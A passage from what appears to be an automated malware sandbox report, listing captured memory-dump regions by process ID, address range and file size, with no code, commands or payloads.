                                                                                                                                                                                                              • memory/3644-229-0x0000000005CF0000-0x0000000005CF1000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3644-280-0x0000000006920000-0x0000000006921000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3644-250-0x0000000006810000-0x0000000006811000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3644-220-0x00000000032B0000-0x00000000032CF000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                124KB

                                                                                                                                                                                                              • memory/3644-222-0x00000000017F0000-0x000000000193A000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                              • memory/3644-225-0x0000000003600000-0x000000000361D000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                116KB

                                                                                                                                                                                                              • memory/3644-230-0x0000000005CF2000-0x0000000005CF3000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3644-226-0x0000000000400000-0x00000000016E0000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                18.9MB

                                                                                                                                                                                                              • memory/3644-295-0x0000000005CF4000-0x0000000005CF6000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                8KB

                                                                                                                                                                                                              • memory/3644-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/3644-205-0x00000000019D8000-0x00000000019FB000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                140KB

                                                                                                                                                                                                              • memory/3644-245-0x0000000005CB0000-0x0000000005CB1000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3644-232-0x0000000006200000-0x0000000006201000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3644-231-0x0000000005CF3000-0x0000000005CF4000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3856-207-0x0000000000E40000-0x0000000000E42000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                8KB

                                                                                                                                                                                                              • memory/3856-187-0x00000000008B0000-0x00000000008B1000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3856-201-0x00000000009E0000-0x00000000009E1000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3856-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/3888-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/3892-285-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/3892-299-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                80KB

                                                                                                                                                                                                              • memory/3928-143-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/3940-215-0x0000000005640000-0x0000000005641000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3940-422-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/3940-213-0x0000000002E80000-0x0000000002E81000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3940-175-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/3940-549-0x00000000017E0000-0x00000000017E9000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                36KB

                                                                                                                                                                                                              • memory/3940-211-0x00000000054A0000-0x00000000054A1000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/3940-192-0x0000000000C10000-0x0000000000C11000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4016-311-0x000000001AED0000-0x000000001AED2000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                8KB

                                                                                                                                                                                                              • memory/4016-266-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4016-274-0x0000000000380000-0x0000000000381000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4144-359-0x0000000005520000-0x0000000005521000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4144-344-0x0000000077240000-0x00000000773CE000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                              • memory/4144-312-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4168-313-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4168-327-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4188-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4296-466-0x0000000005760000-0x0000000005761000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4296-433-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4340-321-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4428-326-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4428-360-0x0000000004F40000-0x0000000004F41000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4540-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4588-476-0x00000000031D0000-0x0000000003203000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                204KB

                                                                                                                                                                                                              • memory/4588-471-0x0000000000400000-0x00000000016D4000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                18.8MB

                                                                                                                                                                                                              • memory/4588-393-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4632-395-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4632-416-0x0000000002B50000-0x0000000002B51000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/4764-353-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4780-402-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4908-405-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4908-513-0x00000000033B0000-0x0000000003486000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                856KB

                                                                                                                                                                                                              • memory/4908-530-0x0000000000400000-0x000000000172D000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                19.2MB

                                                                                                                                                                                                              • memory/4956-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4968-410-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/4996-371-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                80KB

                                                                                                                                                                                                              • memory/4996-365-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/5016-481-0x0000000005A30000-0x0000000005A31000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/5016-447-0x0000000077240000-0x00000000773CE000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                              • memory/5016-409-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/5040-367-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/5040-381-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/5048-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/5048-490-0x00000000053B0000-0x00000000053B1000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/5048-462-0x0000000077240000-0x00000000773CE000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                              • memory/5056-542-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/5084-382-0x0000000000B50000-0x0000000000B51000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/5084-370-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                              • memory/5192-592-0x0000000004FB0000-0x0000000004FB1000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/5296-593-0x0000000077240000-0x00000000773CE000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.6MB

                                                                                                                                                                                                              • memory/5296-609-0x0000000005B20000-0x0000000005B21000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                4KB

                                                                                                                                                                                                              • memory/5440-611-0x0000000005720000-0x0000000005C1E000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                5.0MB

                                                                                                                                                                                                              • memory/5656-627-0x0000000004208000-0x0000000004309000-memory.dmp
                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                1.0MB